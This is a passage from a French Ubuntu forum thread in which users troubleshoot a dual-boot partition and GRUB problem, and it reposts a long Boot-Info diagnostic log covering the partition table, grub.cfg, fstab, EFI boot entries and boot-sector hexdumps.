installées, j'ai un "Paramètre Système" affiché mais avec un icône de "fichier". Et quand je le lance j'ai une sorte de vieille version de "Paramètre" Dernière modification par Raze (Le 25/03/2014, à 20:32) Hors ligne Raze Re : [Résolu] Conseils partition Up Je pense dans tout les cas réinstaller la 14.04, ça réglera le problème. Mais c'est surtout pour comprendre. Si quelqu'un a une idée Et aussi pour le grub.. Hors ligne malbo Re : [Résolu] Conseils partition Au cas où il viendrait à disparaître du site paste.ubuntu.com, je colle ici ton Boot-Info du post #14 ( http://paste.ubuntu.com/7152448/ ) : Boot Info Script e7fc706 + Boot-Repair extra info [Boot-Info 23Dec2013] ============================= Boot Info Summary: =============================== => No boot loader is installed in the MBR of /dev/sda. sda1: __________________________________________________________________________ File system: ntfs Boot sector type: Windows 8/2012: NTFS Boot sector info: No errors found in the Boot Parameter Block. Operating System: Boot files: sda2: __________________________________________________________________________ File system: vfat Boot sector type: Windows 8/2012: FAT32 Boot sector info: No errors found in the Boot Parameter Block. Operating System: Boot files: /EFI/Boot/bootx64.efi /EFI/ubuntu/MokManager.efi /EFI/ubuntu/grubx64.efi /EFI/ubuntu/shimx64.efi /EFI/Microsoft/Boot/bootmgfw.efi /EFI/Microsoft/Boot/bootmgr.efi /EFI/Microsoft/Boot/memtest.efi /bootmgr /boot/bcd sda3: __________________________________________________________________________ File system: Boot sector type: - Boot sector info: Mounting failed: mount: unknown filesystem type '' sda4: __________________________________________________________________________ File system: ntfs Boot sector type: Windows 8/2012: NTFS Boot sector info: No errors found in the Boot Parameter Block. Operating System: Boot files: /bootmgr /Windows/System32/winload.exe sda5: __________________________________________________________________________ File system: ntfs Boot sector type: Windows 8/2012: NTFS Boot sector info: No errors found in the Boot Parameter Block. Operating System: Boot files: sda6: __________________________________________________________________________ File system: ntfs Boot sector type: Windows 8/2012: NTFS Boot sector info: According to the info in the boot sector, sda6 starts at sector 573949952. But according to the info from fdisk, sda6 starts at sector 1413955585. Operating System: Boot files: sda7: __________________________________________________________________________ File system: vfat Boot sector type: Windows 8/2012: FAT32 Boot sector info: According to the info in the boot sector, sda7 starts at sector 623044608. But according to the info from fdisk, sda7 starts at sector 1463050241. Operating System: Boot files: /EFI/Asclepius/bootx64.efi /EFI/ubuntu/shimx64.efi /EFI/Microsoft/Boot/memtest.efi /bootmgr /boot/bcd sda8: __________________________________________________________________________ File system: ntfs Boot sector type: Windows Vista: NTFS Boot sector info: No errors found in the Boot Parameter Block. Operating System: Boot files: sda9: __________________________________________________________________________ File system: ext4 Boot sector type: - Boot sector info: Operating System: Ubuntu 13.10 Boot files: /boot/grub/grub.cfg /etc/fstab sda10: _________________________________________________________________________ File system: swap Boot sector type: - Boot sector info: ============================ Drive/Partition Info: ============================= Drive: sda _____________________________________________________________________ Disk /dev/sda: 750.2 GB, 750156374016 bytes 256 heads, 63 sectors/track, 90845 cylinders, total 1465149168 sectors Units = sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 4096 bytes Partition Boot Start Sector End Sector # of Sectors Id System /dev/sda1 1 4,294,967,295 4,294,967,295 ee GPT /dev/sda1 ends after the last sector of /dev/sda GUID Partition Table detected. Partition Start Sector End Sector # of Sectors System /dev/sda1 2,048 1,023,999 1,021,952 - /dev/sda2 1,024,000 1,638,399 614,400 EFI System partition /dev/sda3 1,638,400 1,900,543 262,144 Microsoft Reserved Partition (Windows) /dev/sda4 1,900,544 421,330,943 419,430,400 Data partition (Windows/Linux) /dev/sda5 1,413,240,832 1,413,955,583 714,752 - /dev/sda6 1,413,955,585 1,463,050,240 49,094,656 - /dev/sda7 1,463,050,241 1,465,147,392 2,097,152 - /dev/sda8 421,330,944 1,335,689,215 914,358,272 Data partition (Windows/Linux) /dev/sda9 1,335,689,216 1,401,239,551 65,550,336 Data partition (Linux) /dev/sda10 1,401,239,552 1,413,240,831 12,001,280 Swap partition (Linux) "blkid" output: ________________________________________________________________ Device UUID TYPE LABEL /dev/sda1 A8FE17CBFE179124 ntfs Windows RE tools /dev/sda10 632ef09f-03fe-494f-a0d0-9363afbdb95a swap /dev/sda2 221A-48C2 vfat SYSTEM /dev/sda4 CA4A1C124A1BFA41 ntfs /dev/sda5 A634B08C34B060CB ntfs /dev/sda6 68F2F827F2F7F6E2 ntfs SAMSUNG_REC2 /dev/sda7 761F-122C vfat SAMSUNG_REC /dev/sda8 0B5469F93714115B ntfs D /dev/sda9 97761c0a-2582-4131-833d-9aac316ea3c1 ext4 ================================ Mount points: ================================= Device Mount_Point Type Options /dev/sda2 /boot/efi vfat (rw) /dev/sda8 /media/raphael/D fuseblk (rw,nosuid,nodev,allow_other,default_permissions,blksize=4096) /dev/sda9 / ext4 (rw,errors=remount-ro) =========================== sda9/boot/grub/grub.cfg: =========================== -------------------------------------------------------------------------------- # # DO NOT EDIT THIS FILE # # It is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # ### BEGIN /etc/grub.d/00_header ### if [ -s $prefix/grubenv ]; then set have_grubenv=true load_env fi set default="0" if [ x"${feature_menuentry_id}" = xy ]; then menuentry_id_option="--id" else menuentry_id_option="" fi export menuentry_id_option if [ "${prev_saved_entry}" ]; then set saved_entry="${prev_saved_entry}" save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z "${boot_once}" ]; then saved_entry="${chosen}" save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n "${have_grubenv}" ]; then if [ -z "${boot_once}" ]; then save_env recordfail; fi; fi } function load_video { if [ x$feature_all_video_module = xy ]; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x$feature_default_font_path = xy ] ; then font=unicode else insmod part_gpt insmod ext2 set root='hd0,gpt9' if [ x$feature_platform_search_hint = xy ]; then search --no-floppy --fs-uuid --set=root --hint-bios=hd0,gpt9 --hint-efi=hd0,gpt9 --hint-baremetal=ahci0,gpt9 97761c0a-2582-4131-833d-9aac316ea3c1 else search --no-floppy --fs-uuid --set=root 97761c0a-2582-4131-833d-9aac316ea3c1 fi font="/usr/share/grub/unicode.pf2" fi if loadfont $font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir=$prefix/locale set lang=fr_FR insmod gettext fi terminal_output gfxterm if [ "${recordfail}" = 1 ]; then set timeout=10 else set timeout=10 fi ### END /etc/grub.d/00_header ### ### BEGIN /etc/grub.d/05_debian_theme ### set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30; then clear fi ### END /etc/grub.d/05_debian_theme ### ### BEGIN /etc/grub.d/10_linux ### function gfxmode { set gfxpayload="${1}" if [ "${1}" = "keep" ]; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ "${recordfail}" != 1 ]; then if [ -e ${prefix}/gfxblacklist.txt ]; then if hwmatch ${prefix}/gfxblacklist.txt 3; then if [ ${match} = 0 ]; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode menuentry 'Ubuntu' --class ubuntu --class gnu-linux --class gnu --class os $menuentry_id_option 'gnulinux-simple-97761c0a-2582-4131-833d-9aac316ea3c1' { recordfail load_video gfxmode $linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0,gpt9' if [ x$feature_platform_search_hint = xy ]; then search --no-floppy --fs-uuid --set=root --hint-bios=hd0,gpt9 --hint-efi=hd0,gpt9 --hint-baremetal=ahci0,gpt9 97761c0a-2582-4131-833d-9aac316ea3c1 else search --no-floppy --fs-uuid --set=root 97761c0a-2582-4131-833d-9aac316ea3c1 fi linux /boot/vmlinuz-3.11.0-18-generic.efi.signed root=UUID=97761c0a-2582-4131-833d-9aac316ea3c1 ro quiet splash $vt_handoff initrd /boot/initrd.img-3.11.0-18-generic } submenu 'Advanced options for Ubuntu' $menuentry_id_option 'gnulinux-advanced-97761c0a-2582-4131-833d-9aac316ea3c1' { menuentry 'Ubuntu, with Linux 3.11.0-18-generic' --class ubuntu --class gnu-linux --class gnu --class os $menuentry_id_option 'gnulinux-3.11.0-18-generic-advanced-97761c0a-2582-4131-833d-9aac316ea3c1' { recordfail load_video gfxmode $linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0,gpt9' if [ x$feature_platform_search_hint = xy ]; then search --no-floppy --fs-uuid --set=root --hint-bios=hd0,gpt9 --hint-efi=hd0,gpt9 --hint-baremetal=ahci0,gpt9 97761c0a-2582-4131-833d-9aac316ea3c1 else search --no-floppy --fs-uuid --set=root 97761c0a-2582-4131-833d-9aac316ea3c1 fi echo 'Loading Linux 3.11.0-18-generic ...' linux /boot/vmlinuz-3.11.0-18-generic.efi.signed root=UUID=97761c0a-2582-4131-833d-9aac316ea3c1 ro quiet splash $vt_handoff echo 'Loading initial ramdisk ...' initrd /boot/initrd.img-3.11.0-18-generic } menuentry 'Ubuntu, with Linux 3.11.0-18-generic (recovery mode)' --class ubuntu --class gnu-linux --class gnu --class os $menuentry_id_option 'gnulinux-3.11.0-18-generic-recovery-97761c0a-2582-4131-833d-9aac316ea3c1' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 set root='hd0,gpt9' if [ x$feature_platform_search_hint = xy ]; then search --no-floppy --fs-uuid --set=root --hint-bios=hd0,gpt9 --hint-efi=hd0,gpt9 --hint-baremetal=ahci0,gpt9 97761c0a-2582-4131-833d-9aac316ea3c1 else search --no-floppy --fs-uuid --set=root 97761c0a-2582-4131-833d-9aac316ea3c1 fi echo 'Loading Linux 3.11.0-18-generic ...' linux /boot/vmlinuz-3.11.0-18-generic.efi.signed root=UUID=97761c0a-2582-4131-833d-9aac316ea3c1 ro recovery nomodeset echo 'Loading initial ramdisk ...' initrd /boot/initrd.img-3.11.0-18-generic } } ### END /etc/grub.d/10_linux ### ### BEGIN /etc/grub.d/20_linux_xen ### ### END /etc/grub.d/20_linux_xen ### ### BEGIN /etc/grub.d/20_memtest86+ ### ### END /etc/grub.d/20_memtest86+ ### ### BEGIN /etc/grub.d/25_custom ### menuentry "Windows UEFI bootmgfw.efi" { search --fs-uuid --no-floppy --set=root 221A-48C2 chainloader (${root})/EFI/Microsoft/Boot/bootmgfw.efi } menuentry "Windows Boot UEFI loader" { search --fs-uuid --no-floppy --set=root 221A-48C2 chainloader (${root})/EFI/Boot/bootx64.efi } menuentry "EFI/ubuntu/MokManager.efi" { search --fs-uuid --no-floppy --set=root 221A-48C2 chainloader (${root})/EFI/ubuntu/MokManager.efi } menuentry "EFI/Asclepius/bootx64.efi" { search --fs-uuid --no-floppy --set=root 761F-122C chainloader (${root})/EFI/Asclepius/bootx64.efi } ### END /etc/grub.d/25_custom ### ### BEGIN /etc/grub.d/30_os-prober ### menuentry "Windows Boot Manager (UEFI on /dev/sda2)" --class windows --class os { insmod part_gpt insmod fat set root='hd0,gpt2' if [ x$feature_platform_search_hint = xy ]; then search --no-floppy --fs-uuid --set=root --hint-bios=hd0,gpt2 --hint-efi=hd0,gpt2 --hint-baremetal=ahci0,gpt2 221A-48C2 else search --no-floppy --fs-uuid --set=root 221A-48C2 fi chainloader /EFI/Microsoft/Boot/bootmgfw.efi } ### END /etc/grub.d/30_os-prober ### ### BEGIN /etc/grub.d/30_uefi-firmware ### menuentry 'System setup' $menuentry_id_option 'uefi-firmware' { fwsetup } ### END /etc/grub.d/30_uefi-firmware ### ### BEGIN /etc/grub.d/40_custom ### # This file provides an easy way to add custom menu entries. Simply type the # menu entries you want to add after this comment. Be careful not to change # the 'exec tail' line above. ### END /etc/grub.d/40_custom ### ### BEGIN /etc/grub.d/41_custom ### if [ -f ${config_directory}/custom.cfg ]; then source ${config_directory}/custom.cfg elif [ -z "${config_directory}" -a -f $prefix/custom.cfg ]; then source $prefix/custom.cfg; fi ### END /etc/grub.d/41_custom ### -------------------------------------------------------------------------------- =============================== sda9/etc/fstab: ================================ -------------------------------------------------------------------------------- # /etc/fstab: static file system information. # # Use 'blkid' to print the universally unique identifier for a # device; this may be used with UUID= as a more robust way to name devices # that works even if disks are added and removed. See fstab(5). # # <file system> <mount point> <type> <options> <dump> <pass> # / was on /dev/sda9 during installation UUID=97761c0a-2582-4131-833d-9aac316ea3c1 / ext4 errors=remount-ro 0 1 # /boot/efi was on /dev/sda2 during installation #UUID=221A-48C2 /boot/efi vfat defaults 0 1 # swap was on /dev/sda10 during installation UUID=632ef09f-03fe-494f-a0d0-9363afbdb95a none swap sw 0 0 UUID=221A-48C2 /boot/efi vfat defaults 0 1 -------------------------------------------------------------------------------- =================== sda9: Location of files loaded by Grub: ==================== GiB - GB File Fragment(s) ======================== Unknown MBRs/Boot Sectors/etc: ======================== Unknown GPT Partiton Type a4bb94ded106404da1a6bfd50179d6ac Unknown GPT Partiton Type a4bb94ded106404da1a6bfd50179d6ac Unknown GPT Partiton Type a4bb94ded106404da1a6bfd50179d6ac Unknown GPT Partiton Type a4bb94ded106404da1a6bfd50179d6ac =============================== StdErr Messages: =============================== cat: /tmp/BootInfo-DtofJTIa/Tmp_Log: No such file or directory ADDITIONAL INFORMATION : =================== log of boot-repair 2014-03-25__19h25 =================== boot-repair version : 3.199~ppa40~saucy boot-sav version : 3.199~ppa40~saucy glade2script version : 3.2.2~ppa47~saucy boot-sav-extra version : 3.199~ppa40~saucy boot-repair is executed in installed-session (Ubuntu 13.10, saucy, Ubuntu, x86_64) CPU op-mode(s): 32-bit, 64-bit BOOT_IMAGE=/boot/vmlinuz-3.11.0-18-generic.efi.signed root=UUID=97761c0a-2582-4131-833d-9aac316ea3c1 ro quiet splash vt.handoff=7 WARNING: GPT (GUID Partition Table) detected on '/dev/sda'! The util fdisk doesn't support GPT. Use GNU Parted. =================== os-prober: /dev/sda9:L'OS actuellement utilisé - Ubuntu 13.10 CurrentSession:linux /dev/sda2@/EFI/Microsoft/Boot/bootmgfw.efi:Windows Boot Manager:Windows:efi =================== blkid: /dev/sda1: LABEL="Windows RE tools" UUID="A8FE17CBFE179124" TYPE="ntfs" /dev/sda2: LABEL="SYSTEM" UUID="221A-48C2" TYPE="vfat" /dev/sda4: UUID="CA4A1C124A1BFA41" TYPE="ntfs" /dev/sda5: UUID="A634B08C34B060CB" TYPE="ntfs" /dev/sda6: LABEL="SAMSUNG_REC2" UUID="68F2F827F2F7F6E2" TYPE="ntfs" /dev/sda7: LABEL="SAMSUNG_REC" UUID="761F-122C" TYPE="vfat" /dev/sda8: LABEL="D" UUID="0B5469F93714115B" TYPE="ntfs" /dev/sda9: UUID="97761c0a-2582-4131-833d-9aac316ea3c1" TYPE="ext4" /dev/sda10: UUID="632ef09f-03fe-494f-a0d0-9363afbdb95a" TYPE="swap" 1 disks with OS, 2 OS : 1 Linux, 0 MacOS, 1 Windows, 0 unknown type OS. Windows not detected by os-prober on sda4. Attention : identifiant de table de partitions GPT (GUID) détecté sur « /dev/sda ». L'utilitaire sfdisk ne prend pas GPT en charge. Utilisez GNU Parted. WARNING: GPT (GUID Partition Table) detected on '/dev/sda'! The util fdisk doesn't support GPT. Use GNU Parted. =================== /etc/grub.d/ : drwxr-xr-x 2 root root 4096 mars 25 19:21 grub.d total 76 -rwxr-xr-x 1 root root 7850 oct. 10 19:48 00_header -rwxr-xr-x 1 root root 5949 août 15 2013 05_debian_theme -rwxr-xr-x 1 root root 11479 oct. 10 19:48 10_linux -rwxr-xr-x 1 root root 10258 oct. 10 19:48 20_linux_xen -rwxr-xr-x 1 root root 1798 juin 17 2013 20_memtest86+ -rwxr-xr-x 1 root root 593 mars 25 19:21 25_custom -rwxr-xr-x 1 root root 11531 oct. 10 19:48 30_os-prober -rwxr-xr-x 1 root root 1426 oct. 10 19:48 30_uefi-firmware -rwxr-xr-x 1 root root 214 oct. 10 19:48 40_custom -rwxr-xr-x 1 root root 216 oct. 10 19:48 41_custom -rw-r--r-- 1 root root 483 oct. 10 19:48 README =================== /etc/default/grub : # If you change this file, run 'update-grub' afterwards to update # /boot/grub/grub.cfg. # For full documentation of the options in this file, see: # info -f grub -n 'Simple configuration' GRUB_DEFAULT=0 #GRUB_HIDDEN_TIMEOUT=0 GRUB_HIDDEN_TIMEOUT_QUIET=true GRUB_TIMEOUT=10 GRUB_DISTRIBUTOR=`lsb_release -i -s 2> /dev/null || echo Debian` GRUB_CMDLINE_LINUX_DEFAULT="quiet splash" GRUB_CMDLINE_LINUX="" # Uncomment to enable BadRAM filtering, modify to suit your needs # This works with Linux (no patch required) and with any kernel that obtains # the memory map information from GRUB (GNU Mach, kernel of FreeBSD ...) #GRUB_BADRAM="0x01234567,0xfefefefe,0x89abcdef,0xefefefef" # Uncomment to disable graphical terminal (grub-pc only) #GRUB_TERMINAL=console # The resolution used on graphical terminal # note that you can use only modes which your graphic card supports via VBE # you can see them in real GRUB with the command `vbeinfo' #GRUB_GFXMODE=640x480 # Uncomment if you don't want GRUB to pass "root=UUID=xxx" parameter to Linux #GRUB_DISABLE_LINUX_UUID=true # Uncomment to disable generation of recovery mode menu entries #GRUB_DISABLE_RECOVERY="true" # Uncomment to get a beep at grub start #GRUB_INIT_TUNE="480 440 1" /boot/efi detected in the fstab of sda9: UUID=221A-48C2 (sda2) Presence of EFI/Microsoft file detected: /boot/efi/EFI/Microsoft/Boot/bootmgfw.efi Presence of EFI/Boot file detected: /boot/efi/EFI/Boot/bootx64.efi efibootmgr -v BootCurrent: 000B Timeout: 0 seconds BootOrder: 000B,0008,000A,0003,0004,0006,0007,0009 Boot0000 Setup Boot0001 Boot Menu Boot0002 Recovery Boot0003* SATA HDD: 030a2500d23878bc820f604d8316c068ee79d25b91af625956449f41a7b91f4f892ab0f600 Boot0004* SATA CD: 030a2400d23878bc820f604d8316c068ee79d25baea2090adfde214e8b3a5e471856a354 Boot0005* CD-ROM: 030a2400d23878bc820f604d8316c068ee79d25bbe9d0102e211f3489efa0b983c96839b Boot0006* USB CD: 030a2400d23878bc820f604d8316c068ee79d25b86701296aa5a7848b66cd49dd3ba6a55 Boot0007* USB FDD: 030a2400d23878bc820f604d8316c068ee79d25b6ff015a28830b543a8b8641009461e49 Boot0008* USB HDD: 030a2400d23878bc820f604d8316c068ee79d25b33e821aaaf33bc4789bd419f88c50803 Boot0009* NETWORK: 030a2400d23878bc820f604d8316c068ee79d25b78a84aaf2b2afc4ea79cf5cc8f3d3803 Boot000A* Windows Boot Manager HD(2,fa000,96000,9e0f0c03-ccbe-476d-a58b-3ba51bca0d67)File(EFIMicrosoftBootbootmgfw.efi)WINDOWS.........x...B.C.D.O.B.J.E.C.T.=.{.9.d.e.a.8.6.2.c.-.5.c.d.d.-.4.e.7.0.-.a.c.c.1.-.f.3.2.b.3.4.4.d.4.7.9.5.}.................... Boot000B* ubuntu HD(2,fa000,96000,9e0f0c03-ccbe-476d-a58b-3ba51bca0d67)File(EFIubuntushimx64.efi) =================== UEFI/Legacy mode: BIOS is EFI-compatible, and is setup in EFI-mode for this installed-session. SecureBoot disabled. (maybe sec-boot, Veuillez indiquer ce message à [email protected]) =================== PARTITIONS & DISKS: sda9 : sda, not-sepboot, grubenv-ok grub2, signed grub-efi , update-grub, 64, with-boot, is-os, not--efi--part, fstab-without-boot, fstab-has-goodEFI, no-nt, no-winload, no-recov-nor-hid, no-bmgr, notwinboot, apt-get, grub-install, with--usr, fstab-without-usr, not-sep-usr, standard, farbios, . sda1 : sda, not-sepboot, no-grubenv nogrub, no-docgrub, no-update-grub, 32, no-boot, no-os, not--efi--part, part-has-no-fstab, part-has-no-fstab, no-nt, no-winload, recovery-or-hidden, no-bmgr, notwinboot, nopakmgr, nogrubinstall, no---usr, part-has-no-fstab, not-sep-usr, standard, not-far, /mnt/boot-sav/sda1. sda2 : sda, not-sepboot, no-grubenv nogrub, no-docgrub, no-update-grub, 32, no-boot, no-os, is-correct-EFI, part-has-no-fstab, part-has-no-fstab, no-nt, no-winload, no-recov-nor-hid, bootmgr, is-winboot, nopakmgr, nogrubinstall, no---usr, part-has-no-fstab, not-sep-usr, standard, not-far, /boot/efi. sda4 : sda, not-sepboot, no-grubenv nogrub, no-docgrub, no-update-grub, 32, no-boot, is-os, not--efi--part, part-has-no-fstab, part-has-no-fstab, no-nt, haswinload, no-recov-nor-hid, bootmgr, notwinboot, nopakmgr, nogrubinstall, no---usr, part-has-no-fstab, not-sep-usr, standard, farbios, /mnt/boot-sav/sda4. sda5 : sda, not-sepboot, no-grubenv nogrub, no-docgrub, no-update-grub, 32, no-boot, no-os, not--efi--part, part-has-no-fstab, part-has-no-fstab, no-nt, no-winload, recovery-or-hidden, no-bmgr, notwinboot, nopakmgr, nogrubinstall, no---usr, part-has-no-fstab, not-sep-usr, standard, farbios, /mnt/boot-sav/sda5. sda6 : sda, not-sepboot, no-grubenv nogrub, no-docgrub, no-update-grub, 32, no-boot, no-os, not--efi--part, part-has-no-fstab, part-has-no-fstab, no-nt, no-winload, recovery-or-hidden, no-bmgr, notwinboot, nopakmgr, nogrubinstall, no---usr, part-has-no-fstab, not-sep-usr, standard, farbios, /mnt/boot-sav/sda6. sda7 : sda, not-sepboot, no-grubenv nogrub, no-docgrub, no-update-grub, 32, no-boot, no-os, is-maybe-EFI, part-has-no-fstab, part-has-no-fstab, no-nt, no-winload, recovery-or-hidden, bootmgr, is-winboot, nopakmgr, nogrubinstall, no---usr, part-has-no-fstab, not-sep-usr, standard, farbios, /mnt/boot-sav/sda7. sda8 : sda, not-sepboot, no-grubenv nogrub, no-docgrub, no-update-grub, 32, no-boot, no-os, not--efi--part, part-has-no-fstab, part-has-no-fstab, no-nt, no-winload, no-recov-nor-hid, no-bmgr, notwinboot, nopakmgr, nogrubinstall, no---usr, part-has-no-fstab, not-sep-usr, standard, farbios, /media/raphael/D. sda : GPT, no-BIOS_boot, has-correctEFI, not-usb, has-os, 2048 sectors * 512 bytes =================== parted -l: Model: ATA ST750LM022 HN-M7 (scsi) Disk /dev/sda: 750GB Sector size (logical/physical): 512B/4096B Partition Table: gpt Number Start End Size File system Name Flags 1 1049kB 524MB 523MB ntfs Basi hidden 2 524MB 839MB 315MB fat32 EFI boot 3 839MB 973MB 134MB Micr msftres 4 973MB 216GB 215GB ntfs msftdata 8 216GB 684GB 468GB ntfs msftdata 9 684GB 717GB 33.6GB ext4 10 717GB 724GB 6145MB linux-swap(v1) 5 724GB 724GB 366MB ntfs hidden 6 724GB 749GB 25.1GB ntfs Basi hidden 7 749GB 750GB 1074MB fat32 Basi hidden =================== parted -lm: BYT; /dev/sda:750GB:scsi:512:4096:gpt:ATA ST750LM022 HN-M7; 1:1049kB:524MB:523MB:ntfs:Basi:hidden; 2:524MB:839MB:315MB:fat32:EFI :boot; 3:839MB:973MB:134MB::Micr:msftres; 4:973MB:216GB:215GB:ntfs::msftdata; 8:216GB:684GB:468GB:ntfs::msftdata; 9:684GB:717GB:33.6GB:ext4::; 10:717GB:724GB:6145MB:linux-swap(v1)::; 5:724GB:724GB:366MB:ntfs::hidden; 6:724GB:749GB:25.1GB:ntfs:Basi:hidden; 7:749GB:750GB:1074MB:fat32:Basi:hidden; =================== mount: /dev/sda9 on / type ext4 (rw,errors=remount-ro) proc on /proc type proc (rw,noexec,nosuid,nodev) sysfs on /sys type sysfs (rw,noexec,nosuid,nodev) none on /sys/fs/cgroup type tmpfs (rw) none on /sys/fs/fuse/connections type fusectl (rw) none on /sys/kernel/debug type debugfs (rw) none on /sys/kernel/security type securityfs (rw) none on /sys/firmware/efi/efivars type efivarfs (rw) udev on /dev type devtmpfs (rw,mode=0755) devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620) tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755) none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880) none on /run/shm type tmpfs (rw,nosuid,nodev) none on /run/user type tmpfs (rw,noexec,nosuid,nodev,size=104857600,mode=0755) none on /sys/fs/pstore type pstore (rw) /dev/sda2 on /boot/efi type vfat (rw) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,noexec,nosuid,nodev) systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd) gvfsd-fuse on /run/user/1000/gvfs type fuse.gvfsd-fuse (rw,nosuid,nodev,user=raphael) /dev/sda8 on /media/raphael/D type fuseblk (rw,nosuid,nodev,allow_other,default_permissions,blksize=4096) /dev/sda1 on /mnt/boot-sav/sda1 type fuseblk (rw,nosuid,nodev,allow_other,blksize=4096) /dev/sda4 on /mnt/boot-sav/sda4 type fuseblk (rw,nosuid,nodev,allow_other,blksize=4096) /dev/sda5 on /mnt/boot-sav/sda5 type fuseblk (rw,nosuid,nodev,allow_other,blksize=4096) /dev/sda6 on /mnt/boot-sav/sda6 type fuseblk (rw,nosuid,nodev,allow_other,blksize=4096) /dev/sda7 on /mnt/boot-sav/sda7 type vfat (rw) =================== ls: /sys/block/sda (filtered): alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro sda1 sda10 sda2 sda3 sda4 sda5 sda6 sda7 sda8 sda9 size slaves stat subsystem trace uevent /sys/block/sr0 (filtered): alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro size slaves stat subsystem trace uevent /dev (filtered): autofs block bsg btrfs-control bus cdrom char console core cpu cpu_dma_latency disk dri ecryptfs fb0 fd full fuse hpet input kmsg kvm log mapper mcelog mei mem net network_latency network_throughput null port ppp psaux ptmx pts random rfkill rtc rtc0 sda sda1 sda10 sda2 sda3 sda4 sda5 sda6 sda7 sda8 sda9 sg0 sg1 shm snapshot snd sr0 stderr stdin stdout uhid uinput urandom v4l vga_arbiter vhost-net video0 zero ls /dev/mapper: control =================== hexdump -n512 -C /dev/sda1 00000000 eb 52 90 4e 54 46 53 20 20 20 20 00 02 08 00 00 |.R.NTFS .....| 00000010 00 00 00 00 00 f8 00 00 3f 00 ff 00 00 08 00 00 |........?.......| 00000020 00 00 00 00 80 00 80 00 ff 97 0f 00 00 00 00 00 |................| 00000030 55 a6 00 00 00 00 00 00 02 00 00 00 00 00 00 00 |U...............| 00000040 f6 00 00 00 01 00 00 00 24 91 17 fe cb 17 fe a8 |........$.......| 00000050 00 00 00 00 fa 33 c0 8e d0 bc 00 7c fb 68 c0 07 |.....3.....|.h..| 00000060 1f 1e 68 66 00 cb 88 16 0e 00 66 81 3e 03 00 4e |..hf......f.>..N| 00000070 54 46 53 75 15 b4 41 bb aa 55 cd 13 72 0c 81 fb |TFSu..A..U..r...| 00000080 55 aa 75 06 f7 c1 01 00 75 03 e9 dd 00 1e 83 ec |U.u.....u.......| 00000090 18 68 1a 00 b4 48 8a 16 0e 00 8b f4 16 1f cd 13 |.h...H..........| 000000a0 9f 83 c4 18 9e 58 1f 72 e1 3b 06 0b 00 75 db a3 |.....X.r.;...u..| 000000b0 0f 00 c1 2e 0f 00 04 1e 5a 33 db b9 00 20 2b c8 |........Z3... +.| 000000c0 66 ff 06 11 00 03 16 0f 00 8e c2 ff 06 16 00 e8 |f...............| 000000d0 4b 00 2b c8 77 ef b8 00 bb cd 1a 66 23 c0 75 2d |K.+.w......f#.u-| 000000e0 66 81 fb 54 43 50 41 75 24 81 f9 02 01 72 1e 16 |f..TCPAu$....r..| 000000f0 68 07 bb 16 68 52 11 16 68 09 00 66 53 66 53 66 |h...hR..h..fSfSf| 00000100 55 16 16 16 68 b8 01 66 61 0e 07 cd 1a 33 c0 bf |U...h..fa....3..| 00000110 0a 13 b9 f6 0c fc f3 aa e9 fe 01 90 90 66 60 1e |.............f`.| 00000120 06 66 a1 11 00 66 03 06 1c 00 1e 66 68 00 00 00 |.f...f.....fh...| 00000130 00 66 50 06 53 68 01 00 68 10 00 b4 42 8a 16 0e |.fP.Sh..h...B...| 00000140 00 16 1f 8b f4 cd 13 66 59 5b 5a 66 59 66 59 1f |.......fY[ZfYfY.| 00000150 0f 82 16 00 66 ff 06 11 00 03 16 0f 00 8e c2 ff |....f...........| 00000160 0e 16 00 75 bc 07 1f 66 61 c3 a1 f6 01 e8 09 00 |...u...fa.......| 00000170 a1 fa 01 e8 03 00 f4 eb fd 8b f0 ac 3c 00 74 09 |............<.t.| 00000180 b4 0e bb 07 00 cd 10 eb f2 c3 0d 0a 41 20 64 69 |............A di| 00000190 73 6b 20 72 65 61 64 20 65 72 72 6f 72 20 6f 63 |sk read error oc| 000001a0 63 75 72 72 65 64 00 0d 0a 42 4f 4f 54 4d 47 52 |curred...BOOTMGR| 000001b0 20 69 73 20 63 6f 6d 70 72 65 73 73 65 64 00 0d | is compressed..| 000001c0 0a 50 72 65 73 73 20 43 74 72 6c 2b 41 6c 74 2b |.Press Ctrl+Alt+| 000001d0 44 65 6c 20 74 6f 20 72 65 73 74 61 72 74 0d 0a |Del to restart..| 000001e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000001f0 00 00 00 00 00 00 8a 01 a7 01 bf 01 00 00 55 aa |..............U.| 00000200 ls /boot/efi/1: ls /boot/efi: Boot bootmgr BOOTNXT BOOTSECT.BAK EFI . Veuillez indiquer ce message à [email protected] =================== hexdump -n512 -C /dev/sda2 00000000 eb 58 90 4d 53 44 4f 53 35 2e 30 00 02 08 5e 1b |.X.MSDOS5.0...^.| 00000010 02 00 00 00 00 f8 00 00 3f 00 ff 00 00 a0 0f 00 |........?.......| 00000020 00 60 09 00 51 02 00 00 00 00 00 00 02 00 00 00 |.`..Q...........| 00000030 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000040 80 01 29 c2 48 1a 22 4e 4f 20 4e 41 4d 45 20 20 |..).H."NO NAME | 00000050 20 20 46 41 54 33 32 20 20 20 33 c9 8e d1 bc f4 | FAT32 